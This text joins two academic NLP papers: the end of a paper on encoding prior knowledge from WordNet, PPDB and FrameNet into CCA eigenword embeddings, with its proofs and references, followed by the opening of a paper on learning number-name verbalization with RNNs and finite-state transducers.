the use of FrameNet as a prior knowledge resource for improv- ing the quality of word embeddings is not as helpful as other resources such as WordNet and PPDB. We note that CCA works especially well for the geographic analogies dataset. The quality of eigen- word embeddings (and the other embeddings) de- grades when we encode prior knowledge using the method of Faruqui et al. (2015). Our method im- proves the quality of eigenword embeddings. Global Picture of the Results When comparing retrofitting to CCA with prior knowledge, there is a noticable difference. Retrofitting performs well or badly, depending on the dataset, while the re- sults with CCA are more stable. We attribute this to the difference between how our algorithm and retrofitting work. Retrofitting makes a direct use of the source of prior knowledge, by adding a regular- ization term that enforces words which are similar according to the prior knowledge to be closer in the embedding space. Our algorithm, on the other hand, makes a more indirect use of the source of prior knowledge, by changing the co-occurence matrix on which we do singular value decomposition. Specifically, we believe that our algorithm is more stable to cases in which words for the task at hand are unknown words with respect to the source of prior knowledge. This is demonstrated with the ge- ographical analogies task: in that case, retrofitting lowers the results in most cases. The city and coun- try names do not appear in the sources of prior knowledge we used. Further Analysis We further inspected the results on the word similarity tasks for the RG-65 and WS- 353-ALL datasets. Our goal was to find cases in which either CCA embeddings by themselves out- perform other types of embeddings or that encoding prior knowledge into CCA the way we describe sig- nificantly improves the results. For the WS-353-ALL dataset, the eigenword em- beddings get a correlation of 69.6. The next best performing word embeddings are the multilingual word embeddings (68.0) and skip-gram (58.3). In- terestingly enough, the multilingual word embed- dings also use CCA to project words into a low- dimensional space using a linear transformation, suggesting that linear projections are a good fit for the WS-353-ALL dataset. The dataset itself includes pairs of common words with a corresponding simi- larity score. The words that appear in the dataset are actually expected to occur in similar contexts, a property that CCA directly encodes when deriving word embeddings. The best performance on the RG-65 dataset is with the Glove word embeddings (76.6). CCA em- beddings give an accuracy of 69.7 on that dataset. However, with this dataset, we observe significant improvement when encoding prior knowledge using our method. For example, using WordNet with this dataset improves the results by 4.2 points (73.9). Us- ing the method of Faruqui et al. (2015) (with Word- Net) on top of our CCA word embeddings improves the results even further by 8.7 points (78.4). The Role of Prior Knowledge We also designed an experiment to test whether using distributional in- formation is necessary for having well-performing word embeddings, or whether it is sufficient to rely on the prior knowledge resource. In order to test this, we created a sparse matrix that corresponds to the graph based on the external resource graph. We then follow up with singular value decomposition on 426 Resource WordSim NP Bracketing WordNet 35.9 73.6 PPDB 37.5 77.9 FrameNet 19.9 74.5 Table 2: Results on word similarity dataset (average over 11 datasets) and NP bracketing. The word embed- dings are derived by using SVD on the similarity graph extracted from the prior knowledge source (WordNet, PPDB and FrameNet). that graph, and get embeddings of size 300. Table 2 gives the results when using these embeddings. We see that the results are consistently lower than the results that appear in Table 1, implying that the use of prior knowledge comes hand in hand with the use of distributional information. When using the retrofitting method by Faruqui et al. on top of these word embeddings, the results barely improved. 6 Related Work Our ideas in this paper for encoding prior knowl- edge in eigenword embeddings relate to three main threads in existing literature. One of the threads focuses on modifying the ob- jective of word vector training algorithms. Yu and Dredze (2014), Xu et al. (2014), Fried and Duh (2015) and Bian et al. (2014) augment the training objective in neural language models of Mikolov et al. (2013a) to encourage semantically related word vectors to come closer to each other. Wang et al. (2014) propose a method for jointly embedding en- tities (from FreeBase, a large community-curated knowledge base) and words (from Wikipedia) into the same continuous vector space. Chen and de Melo (2015) propose a similar joint model to im- prove the word embeddings, but rather than us- ing structured knowledge sources their model fo- cuses on discovering stronger semantic connections in specific contexts in a text corpus. Another research thread relies on post-processing steps to encode prior knowledge from semantic lex- icons in off-the-shelf word embeddings. The main intuition behind this trend is to update word vec- tors by running belief propagation on a graph ex- tracted from the relation information in semantic lexicons. The retrofitting approach of Faruqui et al. (2015) uses such techniques to obtain higher quality semantic vectors using WordNet, FrameNet, and the Paraphrase Database. They report on how retrofitting helps improve the performance of vari- ous off-the-shelf word vectors such as Glove, Skip- Gram, Global Context, and Multilingual, on vari- ous word similarity tasks. Rothe and Schütze (2015) also describe how standard word vectors can be ex- tended to various data types in semantic lexicons, e.g., synsets and lexemes in WordNet. Most of the standard word vector training algo- rithms use co-occurrence within window-based con- texts to measure relatedness among words. Sev- eral studies question the limitations of defining re- latedness in this way and investigate if the word co-occurrence matrix can be constructed to encode prior knowledge directly to improve the quality of word vectors. Wang et al. (2015) investigate the no- tion of relatedness in embedding models by incor- porating syntactic and lexicographic knowledge. In spectral learning, Yih et al. (2012) augment the word co-occurrence matrix on which LSA operates with relational information such that synonyms will tend to have positive cosine similarity, and antonyms will tend to have negative similarities. Their vector space representation successfully projects synonyms and antonyms on opposite sides in the projected space. Chang et al. (2013) further generalize this approach to encode multiple relations (and not just opposing relations, such as synonyms and antonyms) using multi-relational LSA. In spectral learning, most of the studies on in- corporating prior knowledge in word vectors focus on LSA based word embeddings (Yih et al., 2012; Chang et al., 2013; Turney and Littman, 2005; Tur- ney, 2006; Turney and Pantel, 2010). From the technical perspective, our work is also related to that of Jagarlamudi et al. (2011), who showed how to generalize CCA so that it uses lo- cality preserving projections (He and Niyogi, 2004). They also assume the existence of a weight matrix in a multi-view setting that describes the distances between pairs of points in the two views. More generally, CCA is an important component for spectral learning algorithms in the unsupervised setting and with latent variables (Cohen et al., 2014; Narayan and Cohen, 2016; Stratos et al., 2016). Our method for incorporating prior knowledge into CCA could potentially be transferred to these algorithms. 427 7 Conclusion We described a method for incorporating prior knowledge into CCA. Our method requires a rela- tively simple change to the original canonical cor- relation analysis, where extra counts are added to the matrix on which singular value decomposition is performed. We used our method to derive word em- beddings in the style of eigenwords, and tested them on a set of datasets. Our results demonstrate several advantages of encoding prior knowledge into eigen- word embeddings. Acknowledgements The authors would like to thank Paramveer Dhillon for his help with running the SWELL package. The authors would also like to thank Manaal Faruqui and Sujay Kumar Jauhar for their help and techni- cal assistance with the retrofitting package and the word embedding evaluation suite. Thanks also to Ankur Parikh for early discusions on this project. This work was completed while the first author was an intern at the University of Edinburgh, as part of the Equate Scotland program. This research was supported by an EPSRC grant (EP/L02411X/1) and an EU H2020 grant (688139/H2020-ICT-2015; SUMMA). Appendix A: Proofs Proof of Lemma 1. The proof is similar to the one that appears in Koren and Carmel (2003) for Lemma 3.1. The only difference is the use of two views. Note that [X>LY ]ij = ∑ k,k′ XkiLkk′Yk′j . As such, [X>LY ]ij = ∑ k,k′ (nδkk′ − 1)XkiYk′j = n∑ k=1 nXkiYkj − ( n∑ k=1 Xki ) ︸︷︷︸ 0 × ( n∑ k′=1 Yk′j ) ︸︷︷︸ 0 = n[X>Y ]ij, where δkk′ = 1 iff k = k′ and 0 otherwise, and the sec- ond equality relies on the assumption of the data being centered. Proof of Lemma 2. Without loss of generality, assume d ≤ d′. Let u′1, . . . ,u′d be the left singular vectors of A and v′1, . . . ,v ′ d′ be the right ones, and σ1, . . . ,σd be the singular values. Therefore A = ∑d j=1 σju ′ j(v ′ j) >. In addition, the objective equals (after substituting A): m∑ i=1 d∑ j=1 σj〈ui,u′j〉〈vi,v′j〉 = d∑ j=1 σj ( m∑ i=1 〈ui,u′j〉〈vi,v′j〉 ) (5) Note that by the Cauchy-Schwartz inequality: d∑ j=1 m∑ i=1 〈ui,u′j〉〈vi,v′j〉 = m∑ i=1 d∑ j=1 〈ui,u′j〉〈vi,v′j〉 ≤ m∑ i=1 √√√√ d∑ j=1 |〈ui,u′j〉|2 √√√√ d∑ j=1 |〈vi,v′j〉|2 ≤ m In addition, note that if we choose ui = u′i and vi = v′i, then the inequality above becomes an equality, and in addition, the objective in Eq. 5 will equal the sum of the m largest singular vectors ∑m j=1 σj . As such, this assignment to ui and vi maximizes the objective. Proof of Lemma 3. First, by definition of matrix multi- plication, m∑ k=1 (Xuk) >L (Y vk) = ∑ i,j Lij ( m∑ k=1 [Xuk]i[Y vk]j ) . (6) Also, ( dmij )2 = 1 2 ( m∑ k=1 [Xuk] 2 i − 2[Xuk]i[Y vk]j + [Y vk]2j ) . Therefore, 2 ∑ i,j −Lij ( dmij )2 = ∑ i,j −Lij ( m∑ k=1 −2[Xuk]i[Y vk]j ) + ∑ i,j −Lij ( m∑ k=1 [Xuk] 2 i + [Y vk] 2 j ) ︸︷︷︸ 0 = 2 ∑ i,j Lij ( m∑ k=1 [Xuk]i[Y vk]j, ) (7) where the first two terms disappear because of the defini- tion of the Laplacian. The comparison of Eq. 6 to Eq. 7 gives us the necessary result. 428 References Eneko Agirre, Enrique Alfonseca, Keith Hall, Jana Kravalova, Marius Paşca, and Aitor Soroa. 2009. A study on similarity and relatedness using distribu- tional and wordnet-based approaches. In Proceedings of HLT-NAACL. Francis Bach and Michael Jordan. 2005. A probabilistic interpretation of canonical correlation analysis. Tech Report 688, Department of Statistics, University of California, Berkeley. Collin F. Baker, Charles J. Fillmore, and John B. Lowe. 1998. The Berkeley FrameNet project. In Proceed- ings of ACL. Simon Baker, Roi Reichart, and Anna Korhonen. 2014. An unsupervised model for instance level subcatego- rization acquisition. In Proceedings of EMNLP. Mohit Bansal, Kevin Gimpel, and Karen Livescu. 2014. Tailoring continuous word representations for depen- dency parsing. In Proceedings of ACL. Mikhail Belkin, Partha Niyogi, and Vikas Sindhwani. 2006. Manifold regularization: A geometric frame- work for learning from labeled and unlabeled exam- ples. Journal of Machine Learning Research, 7:2399– 2434. Yoshua Bengio, Réjean Ducharme, Pascal Vincent, and Christian Janvin. 2003. A neural probabilistic lan- guage model. Journal of Machine Learning Research, 3:1137–1155. Jiang Bian, Bin Gao, and Tie-Yan Liu. 2014. Knowledge-powered deep learning for word embed- ding. In Machine Learning and Knowledge Discovery in Databases, volume 8724 of Lecture Notes in Com- puter Science, pages 132–148. Avrim Blum and Tom Mitchell. 1998. Combining la- beled and unlabeled data with co-training. In Proceed- ings of COLT. Elia Bruni, Nam-Khanh Tran, and Marco Baroni. 2014. Multimodal distributional semantics. Journal of Arti- ficial Intelligence Research, 49:1–47. Kai-Wei Chang, Wen-tau Yih, and Christopher Meek. 2013. Multi-relational latent semantic analysis. In Proceedings of EMNLP. Jiaqiang Chen and Gerard de Melo. 2015. Semantic in- formation extraction for improved word embeddings. In Proceedings of NAACL Workshop on Vector Space Modeling for NLP. Shay B. Cohen, K. Stratos, Michael Collins, Dean P. Fos- ter, and Lyle Ungar. 2014. Spectral learning of latent- variable PCFGs: Algorithms and sample complexity. Journal of Machine Learning Research. Ronan Collobert and Jason Weston. 2008. A unified ar- chitecture for natural language processing: Deep neu- ral networks with multitask learning. In Proceedings of ICML. Scott Deerwester, Susan T. Dumais, George W. Furnas, Thomas K. Landauer, and Richard Harshman. 1990. Indexing by latent semantic analysis. Journal of the American Society for Information Science, 41(6):391– 407. Paramveer S. Dhillon, Dean P. Foster, and Lyle H. Ungar. 2015. Eigenwords: Spectral word embeddings. Jour- nal of Machine Learning Research, 16:3035–3078. Manaal Faruqui and Chris Dyer. 2014. Improving vector space word representations using multilingual correla- tion. In Proceedings of EACL. Manaal Faruqui and Chris Dyer. 2015. Non- distributional word vector representations. In Pro- ceedings of ACL. Manaal Faruqui, Jesse Dodge, Sujay K. Jauhar, Chris Dyer, Eduard Hovy, and Noah A. Smith. 2015. Retrofitting word vectors to semantic lexicons. In Pro- ceedings of NAACL. Lev Finkelstein, Gabrilovich Evgenly, Matias Yossi, Rivlin Ehud, Solan Zach, Wolfman Gadi, and Ruppin Eytan. 2002. Placing search in context: The concept revisited. ACM Transactions on Information Systems, 20(1):116–131. Daniel Fried and Kevin Duh. 2015. Incorporating both distributional and relational semantics in word repre- sentations. In Proceedings of ICLR. Juri Ganitkevitch, Benjamin Van Durme, and Chris Callison-Burch. 2013. PPDB: The paraphrase database. In Proceedings of NAACL. Guy Halawi, Gideon Dror, Evgeniy Gabrilovich, and Yehuda Koren. 2012. Large-scale learning of word relatedness with constraints. In Proceedings of ACM SIGKDD. Zellig S. Harris. 1957. Co-occurrence and transforma- tion in linguistic structure. Language, 33(3):283–340. Xiaofei He and Partha Niyogi. 2004. Locality preserving projections. In Proceedings of NIPS. Felix Hill, Roi Reichart, and Anna Korhonen. 2015. SimLex-999: Evaluating semantic models with (gen- uine) similarity estimation. Computational Linguis- tics, 41(4):665–695. Eric H Huang, Richard Socher, Christopher D Manning, and Andrew Y Ng. 2012. Improving word representa- tions via global context and multiple word prototypes. In Proceedings of ACL. Jagadeesh Jagarlamudi and Hal Daumé. 2012. Regu- larized interlingual projections: Evaluation on mul- tilingual transliteration. In Proceedings of EMNLP- CoNLL. Jagadeesh Jagarlamudi, Raghavendra Udupa, and Hal Daumé. 2011. Generalization of CCA via spectral embedding. In Proceedings of the Snowbird Learning Workshop of AISTATS. 429 Yehuda Koren and Liran Carmel. 2003. Visualization of labeled data using linear transformations. In Proceed- ings of IEEE Conference on Information Visualization. Thomas K. Landauer, Peter W. Foltz, and Darrell La- ham. 1998. An introduction to latent semantic analy- sis. Discourse Processes, 25:259–284. Angeliki Lazaridou, Eva Maria Vecchi, and Marco Ba- roni. 2013. Fish transporters and miracle homes: How compositional distributional semantics can help NP parsing. In Proceedings of EMNLP. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013a. Efficient estimation of word represen- tations in vector space. In Proceedings of ICLR Work- shop. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S Cor- rado, and Jeff Dean. 2013b. Distributed representa- tions of words and phrases and their compositionality. In Proceedings of NIPS. Tomas Mikolov, Wen tau Yih, and Geoffrey Zweig. 2013c. Linguistic regularities in continuous space word representations. In Proceedings of NAACL-HLT. George A. Miller and Walter G. Charles. 1991. Contex- tual correlates of semantic similarity. Language and Cognitive Processes, 6(1):1–28. George A Miller. 1995. WordNet: A lexical database for English. Communications of the ACM, 38(11):39–41. Andriy Mnih and Geoffrey Hinton. 2007. Three new graphical models for statistical language modelling. In Proceedings of ICML. Shashi Narayan and Shay B. Cohen. 2016. Optimizing spectral learning for parsing. In Proceedings of ACL. Ankur P. Parikh, Shay B. Cohen, and Eric Xing. 2014. Spectral unsupervised parsing with additive tree met- rics. In Proceedings of ACL. Jeffrey Pennington, Richard Socher, and Christopher Manning. 2014. Glove: Global vectors for word rep- resentation. In Proceedings of EMNLP. Kira Radinsky, Eugene Agichtein, Evgeniy Gabrilovich, and Shaul Markovitch. 2011. A word at a time: Com- puting word relatedness using temporal semantic anal- ysis. In Proceedings of ACM WWW. Sascha Rothe and Hinrich Schütze. 2015. AutoEx- tend: Extending word embeddings to embeddings for synsets and lexemes. In Proceedings of ACL-IJCNLP. Herbert Rubenstein and John B. Goodenough. 1965. Contextual correlates of synonymy. Communications of the ACM, 8(10):627–633. Carina Silberer, Vittorio Ferrari, and Mirella Lapata. 2013. Models of semantic representation with visual attributes. In Proceedings of ACL. Richard Socher, John Bauer, Christopher D. Manning, and Andrew Y. Ng. 2013. Parsing with compositional vector grammars. In Proceedings of ACL. Karl Stratos, Michael Collins, and Daniel Hsu. 2015. Model-based word embeddings from decompositions of count matrices. In Proceedings of ACL. Karl Stratos, Michael Collins, and Daniel Hsu. 2016. Unsupervised part-of-speech tagging with anchor hid- den markov models. Transactions of the Association for Computational Linguistics, 4:245–257. Peter D. Turney and Michael L. Littman. 2005. Corpus- based learning of analogies and semantic relations. Machine Learning, 60(1-3):251–278. Peter D. Turney and Patrick Pantel. 2010. From fre- quency to meaning: Vector space models of semantics. Journal of Artificial Intelligence Research, 37(1):141– 188. Peter D. Turney. 2006. Similarity of semantic relations. Computational Linguistics, 32(3):379–416. Zhen Wang, Jianwen Zhang, Jianlin Feng, and Zheng Chen. 2014. Knowledge graph and text jointly em- bedding. In Proceedings of EMNLP. Tong Wang, Abdelrahman Mohamed, and Graeme Hirst. 2015. Learning lexical embeddings with syntactic and lexicographic knowledge. In Proceedings of ACL- IJCNLP. Chang Xu, Yalong Bai, Jiang Bian, Bin Gao, Gang Wang, Xiaoguang Liu, and Tie-Yan Liu. 2014. RC-NET: A general framework for incorporating knowledge into word representations. In Proceedings of the ACM CIKM. Dongqiang Yang and David MW Powers. 2005. Mea- suring semantic similarity in the taxonomy of Word- Net. In Proceedings of the Australasian Conference on Computer Science. David Yarowsky. 1995. Unsupervised word sense dis- ambiguation rivaling supervised methods. In Proceed- ings of ACL. Wen-tau Yih, Geoffrey Zweig, and John Platt. 2012. Po- larity inducing latent semantic analysis. In Proceed- ings of EMNLP-CoNLL. Mo Yu and Mark Dredze. 2014. Improving lexical em- beddings with semantic knowledge. In Proceedings of ACL. 430 work_6m5hm7oumzeynlpkcsrvtr5tey ---- Minimally Supervised Number Normalization Kyle Gorman and Richard Sproat Google, Inc. 111 8th Ave., New York, NY, USA Abstract We propose two models for verbalizing num- bers, a key component in speech recognition and synthesis systems. The first model uses an end-to-end recurrent neural network. The sec- ond model, drawing inspiration from the lin- guistics literature, uses finite-state transducers constructed with a minimal amount of training data. While both models achieve near-perfect performance, the latter model can be trained using several orders of magnitude less data than the former, making it particularly useful for low-resource languages. 1 Introduction Many speech and language applications require text tokens to be converted from one form to another. For example, in text-to-speech synthesis, one must con- vert digit sequences (32) into number names (thirty- two), and appropriately verbalize date and time ex- pressions (12:47 → twelve forty-seven) and abbre- viations (kg → kilograms) while handling allomor- phy and morphological concord (e.g., Sproat, 1996). Quite a bit of recent work on SMS (e.g., Beaufort et al., 2010) and text from social media sites (e.g., Yang and Eisenstein, 2013) has focused on detect- ing and expanding novel abbreviations (e.g., cn u plz hlp). Collectively, such conversions all fall under the rubric of text normalization (Sproat et al., 2001), but this term means radically different things in differ- ent applications. For instance, it is not necessary to detect and verbalize dates and times when preparing social media text for downstream information extrac- tion, but this is essential for speech applications. While expanding novel abbreviations is also im- portant for speech (Roark and Sproat, 2014), num- bers, times, dates, measure phrases and the like are far more common in a wide variety of text genres. Following Taylor (2009), we refer to cate- gories such as cardinal numbers, times, and dates— each of which is semantically well-circumscribed— as semiotic classes. Some previous work on text nor- malization proposes minimally-supervised machine learning techniques for normalizing specific semi- otic classes, such as abbreviations (e.g., Chang et al., 2002; Pennell and Liu, 2011; Roark and Sproat, 2014). This paper continues this tradition by con- tributing minimally-supervised models for normal- ization of cardinal number expressions (e.g., ninety- seven). Previous work on this semiotic class include formal linguistic studies by Corstius (1968) and Hur- ford (1975) and computational models proposed by Sproat (1996; 2010) and Kanis et al. (2005). Of all semiotic classes, numbers are by far the most im- portant for speech, as cardinal (and ordinal) num- bers are not only semiotic classes in their own right, but knowing how to verbalize numbers is important for most of the other classes: one cannot verbalize times, dates, measures, or currency expressions with- out knowing how to verbalize that language’s num- bers as well. One computational approach to number name ver- balization (Sproat, 1996; Kanis et al., 2005) employs a cascade of two finite-state transducers (FSTs). The first FST factors the integer, expressed as a digit se- quence, into sums of products of powers of ten (i.e., in the case of a base-ten number system). This is composed with a second FST that defines how the 507 Transactions of the Association for Computational Linguistics, vol. 4, pp. 507–519, 2016. Action Editor: Jason Eisner. Submission batch: 3/2016; Revision batch: 5/2016; Published 11/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. numeric factors are verbalized, and may also handle allomorphy or morphological concord in languages that require it. Number names can be relatively easy (as in English) or complex (as in Russian; Sproat, 2010) and thus these FSTs may be relatively easy or quite difficult to develop. While the Google text-to- speech (TTS) (see Ebden and Sproat, 2014) and au- tomatic speech recognition (ASR) systems depend on hand-built number name grammars for about 70 languages, developing these grammars for new lan- guages requires extensive research and labor. For some languages, a professional linguist can develop a new grammar in as little as a day, but other lan- guages may require days or weeks of effort. We have also found that it is very common for these hand- written grammars to contain difficult-to-detect er- rors; indeed, the computational models used in this study revealed several long-standing bugs in hand- written number grammars. The amount of time, effort, and expertise required to produce error-free number grammars leads us to consider machine learning solutions. Yet it is im- portant to note that number verbalization poses a dauntingly high standard of accuracy compared to nearly all other speech and language tasks. While one might forgive a TTS system that reads the am- biguous abbreviation plz as plaza rather than the in- tended please, it would be inexcusable for the same system to ever read 72 as four hundred seventy two, even if it rendered the vast majority of numbers cor- rectly. To set the stage for this work, we first (§2–3) briefly describe several experiments with a power- ful and popular machine learning technique, namely recurrent neural networks (RNNs). When provided with a large corpus of parallel data, these systems are highly accurate, but may still produce occasional er- rors, rendering it unusable for applications like TTS. In order to give the reader some background on the relevant linguistic issues, we then review some cross- linguistic properties of cardinal number expressions and propose a finite-state approach to number nor- malization informed by these linguistic properties (§4). The core of the approach is an algorithm for in- ducing language-specific number grammar rules. We evaluate this technique on data from four languages. Figure 1: The neural net architecture for the preliminary Russian cardinal number experiments. Purple LSTM lay- ers perform forwards transitions and green LSTM layers perform backwards transitions. The output is produced by a CTC layer with a softmax activation function. Input to- kens are characters and output tokens are words. 2 Preliminary experiment with recurrent neural networks As part of a separate strand of research, we have been experimenting with various recurrent neural network (RNN) architectures for problems in text normaliza- tion. In one set of experiments, we trained RNNs to learn a mapping from digit sequences marked with morphosyntactic (case and gender) information, and their expression as Russian cardinal number names. The motivation for choosing Russian is that the num- ber name system of this language, like that of many Slavic languages, is quite complicated, and therefore serves as a good test of the abilities of any text nor- malization system. The architecture used was similar to a network employed by Rao et al. (2015) for grapheme- to-phoneme conversion, a superficially similar sequence-to-sequence mapping problem. We used a recurrent network with an input layer, four hidden feed-forward LSTM layers (Hochreiter and Schmid- huber, 1997), and a connectionist temporal classi- fication (CTC) output layer with a softmax activa- tion function (Graves et al., 2006).1 Two of the hidden layers modeled forward sequences and the other two backward sequences. There were 32 in- put nodes—corresponding to characters—and 153 output nodes—corresponding to predicted number name words. Each of the hidden layers had 256 nodes. The full architecture is depicted in Figure 1. The system was trained on 22M unique digit se- 1Experiments with a non-CTC softmax output layer yielded consistently poor results, and we do not report them here. 508 quences ranging from one to one million; these were collected by applying an existing TTS text normal- ization system to several terabytes of web text. Each training example consisted of a digit sequence, gen- der and case features, and the Russian cardinal num- ber verbalization of that number. Thus, for example, the system has to learn to produce the feminine in- strumental form of 60. Examples of these mappings are shown in Table 1, and the various inflected forms of a single cardinal number are given in Table 2. In preliminary experiments, it was discovered that short digit sequences were poorly modeled due to under- sampling, so an additional 240,000 short sequence samples (of three or fewer digits) were added to com- pensate. 2.2M examples (10%) were held out as a development set. The system was trained for one day, after which it had a 0% label error rate (LER) on the development data set. When decoding 240,000 tokens of held-out test data with this model, we achieved very high ac- curacy (LER < .0001). The few remaining errors, however, are a serious obstacle to using this system for TTS. The model appears to make no mistakes ap- plying inflectional suffixes to unseen data. Plausibly, this task was made easier by our positioning of the morphological feature string at the end of the input, making it local to the output inflectional suffix (at least for the last word in the number expression). But it does make errors with respect to the numeric value of the expression. For example, for 9801 plu.ins. (девятью тысячами восьмьюстами одними), the system produced девятью тысячами семьюстами одними (9701 plu.ins.): the morphology is cor- rect, but the numeric value is wrong.2 This pattern of errors was exactly the opposite of what we want for speech applications. One might forgive a TTS system that reads 9801 with the cor- rect numeric value but in the wrong case form: a lis- tener would likely notice the error but would usually not be misled about the message being conveyed. In contrast, reading it as nine thousand seven hundred and one is completely unacceptable, as this would actively mislead the listener. It is worth pointing out that the training set used here—22M examples—was quite large, and we were 2The exact number of errors and their particular details var- ied from run to run. only able to obtain such a large amount of labeled data because we already had a high-quality hand- built grammar designed to do exactly this transduc- tion. It is simply unreasonable to expect that one could obtain this amount of parallel data for a new language (e.g., from naturally-occurring examples, or from speech transcriptions). This problem is es- pecially acute for low-resource languages (i.e., most of the world’s languages), where data is by defini- tion scarce, but where it is also hard to find high- quality linguistic resources or expertise, and where a machine learning approach is thus most needed. In conclusion, the system does not perform as well as we demand, nor is it in any case a practical solu- tion due to the large amount of training data needed. The RNN appears to have done an impressive job of learning the complex inflectional morphology of Russian, but it occasionally chooses the wrong num- ber names altogether. 3 Number normalization with RNNs For the purpose of more directly comparing the per- formance of RNNs with the methods we report on below, we chose to ignore the issue of allomorphy and morphological concord, which appears to be “easy” for generic sequence models like RNNs, and focus instead on verbalizing number expressions in whatever morphological category represents the lan- guage’s citation form. 3.1 Data and general approach For our experiments we used three parallel data sets where the target number name was in citation form (in Russian, nominative case): • A large set consisting of 28,000 examples ex- tracted from several terabytes of web text using an existing TTS text normalization system • A medium set of 9,000 randomly-generated ex- amples (for details, see Appendix A) • A minimal set of 300 examples, consisting of the counting numbers up to 200, and 100 carefully-chosen examples engineered to cover a wide variety of phenomena A separate set of 1,000 randomly-generated exam- ples were held out for evaluation. 509 5 neu.gen. → пяти five 24 mas.acc. → двадцать четыре twenty-four 99 plu.ins. → девяноста девятью ninety-nine 11 fem.nom. → одиннадцать eleven 81 fem.gen. → восьмидесяти одной eighty-one 60 fem.ins. → шестьюдесятью sixty 91 neu.ins. → девяноста одним ninety-one 3 mas.gen. → трёх three Table 1: Example input and output data (and glosses) for the Russian RNN experiments. шестьдесят nominative (nom.) шестидесяти genitive (gen.) шестидесяти dative (dat.) шестьдесят accusative (acc.) шестьюдесятью instrumental (ins.) шестидесяти prepositional (pre.) Table 2: Inflectional forms of the cardinal number number “60” in Russian. The minimal set was intended to be representative of the sort of data one might obtain from a native- speaker when asked to provide all the essential infor- mation about number names in their language.3 In these experiments we used two different RNN models. The first was the same LSTM architecture as above (henceforth referred to as “LSTM”), except that the numbers of input and output nodes were 13 and 53, respectively, due to the smaller input and out- put vocabularies. The second was a TensorFlow-based RNN with an attention mechanism (Mnih et al., 2014), using an overall architecture similar to that used in a system for end-to-end speech recognition (Chan et al., 2016). Specifically, we used a 4-layer pyramidal bidirec- tional LSTM reader that reads input characters, a layer of 256 attentional units, and a 2-layer decoder that produces word sequences. The reader is referred to Chan et al., 2016 for further details. Henceforth we refer to this model as “Attention”. All models were trained for 24 hours, at which point they were determined to have converged. 3Note that the native speaker in question merely needs to be able to answer questions of the form “how do you say ‘23’ in your language?”; they do not need to be linguistically trained. In contrast, hand-built grammars require at least some linguistic sophistication on the part of the grammarian. 3.2 Results and discussion Results for these experiments on a test corpus of 1,000 random examples are given in Table 3. The RNN with attention clearly outperformed the LSTM in that it performed perfectly with both the medium and large training sets, whereas the LSTM made a small percentage of errors. Note that since the numbers were in citation form, there was little room for the LSTM to make inflectional errors, and the er- rors it made were all of the “silly” variety, in which the output simply denotes the wrong number. But neither system was capable of learning valid trans- ductions given just 300 training examples.4 We draw two conclusions from these results. First, even a powerful machine learning model known to be applicable to a wide variety of problems may not be appropriate for all superficially-similar prob- lems. Second, it remains to be seen whether any RNN could be designed to learn effectively from an amount of data as small as our smallest training set. Learning from minimal data sets is of great practical concern, and we will proceed to provide a plausible solution to this problem below. We note again that very low error rates do not ensure that a system is 4The failure of the RNNs to generalize from the minimal training set suggests they are evidently not expressive enough for the sort of “clever” inference that is needed to generalize from so little data. It is plausible that an alternative RNN archi- tecture could learn with such a small amount of data, though we leave it to future research to discover just what such an ar- chitecture might be. In an attempt to provide the RNNs with additional support, we also performed an evaluation with the minimal training set in which inputs were encoded so that each decimal position above 0 was represented with a letter (A for 10, B for 100, and so forth). Thus 2034 was represented as 2C3A4. In principle, this ought to have prevented errors which fail to take positional information into account. Unfortunately, this made no difference whatsoever. 510 Training size LSTM Acc. Attention Acc. Overlap 28,000 0.999 1.000 56% 9,000 0.994 1.000 0% 300 < 0.001 < 0.001 < 1% Table 3: Accuracies on a test corpus of 1,000 random Russian citation-form number-name examples for the two RNN architectures. “Overlap” indicates the percentage of the test examples that are also found in the training data. usable, since not all errors are equally forgivable. 4 Number normalization with finite-state transducers The problem of number normalization naturally de- composes into two subproblems: factorization and verbalization of the numeric factors. We first con- sider the latter problem, the simpler of the two. Let λ be the set of number names in the target lan- guage, and let ν be the set of numerals, the integers denoted by a number name. Then let L : ν∗ → λ∗ be a transducer which replaces a sequence of nu- merals with a sequence of number names. For in- stance, for English, L will map 90 7 to ninety seven. In languages where there are multiple allomorphs or case forms for a numeral, L will be non-functional (i.e., one-to-many); we return to this issue shortly. In nearly all cases, however, there are no more than a few dozen numerals in ν,5 and no more than a few names in λ for the equivalent numeral in ν. There- fore, we assume it is possible to construct L with min- imal effort and minimal knowledge of the language. Indeed, all the information needed to construct L for the experiments conducted in this paper can be found in English-language Wikipedia articles. The remaining subproblem, factorization, is re- sponsible for converting digit sequences to numeral factors. In English, for example, 97000 is factored as 90 7 1000. Factorization is also language-specific. In Standard French, for example, there is no sim- plex number name for ‘90’; instead this is realized as quatre-vingt-dix “four twenty ten”, and thus 97000 (quatre-vingt-dix-sept mille) is factored as 4 20 10 7 1000. It is not a priori obvious how one might go about learning language-specific factorizations. For 5At worst, a small number of languages, such as several Indic languages of North India, effectively use unique numerals for all counting numbers up to 100. inspiration, we turn to a lesser-known body of lin- guistics research focusing on number grammars. Hurford (1975) surveys cross-linguistic properties of number naming and proposes a syntactic repre- sentation which directly relates verbalized number names to the corresponding integers. Hurford inter- prets complex number constructions as arithmetic expressions in which operators (and the parenthe- ses indicating associativity) have been elided. By far the two most common arithmetic operations are multiplication and addition.6 In French, for exam- ple, the expression dix-sept, literally ‘ten seven’, de- notes 17, the sum of its terms, and quatre-vingt(s), literally ‘four twenty’, refers to 80, the product of its terms. These may be combined, in quatre-vingt- dix-sept. To visualize arithmetic operations and as- sociativities, we henceforth write factorizations us- ing s-expressions—pre-order serializations of k-ary trees—with numeral terminals and arithmetic oper- ator non-terminals. For example, quatre-vingt-dix- sept is written (+ (* 4 20) 10 7). Within any language there are cues to this elided arithmetic structure. In some languages, some or all addends are separated by a word translated as and. In other languages it is possible to determine whether terms are to be multiplied or summed depending on their relative magnitudes. In French (as in English), for instance, an expression XY usually is interpreted as a product if X < Y, as in quatre-vingt(s) ‘80’, but as a sum if X > Y, as in vingt-quatre ‘24’. Thus the problem of number denormalization—that is, recov- ering the integer denoted by a verbalized number— can be thought of as a special case of grammar induc- tion from pairs of natural language expressions and 6Some languages make use of half-counting, or multiplica- tion by one half (e.g., Welsh hanner cant, ‘50’, literally ‘half hundred’), or back-counting, i.e., subtraction (e.g., Latin unde- vīgintī, ‘19’, literally ‘one from twenty’; Menninger, 1969, 94f.). But these do not reduce the generality of the approach here. 511 their denotations (e.g., Kwiatkowski et al., 2011). 4.1 FST model The complete 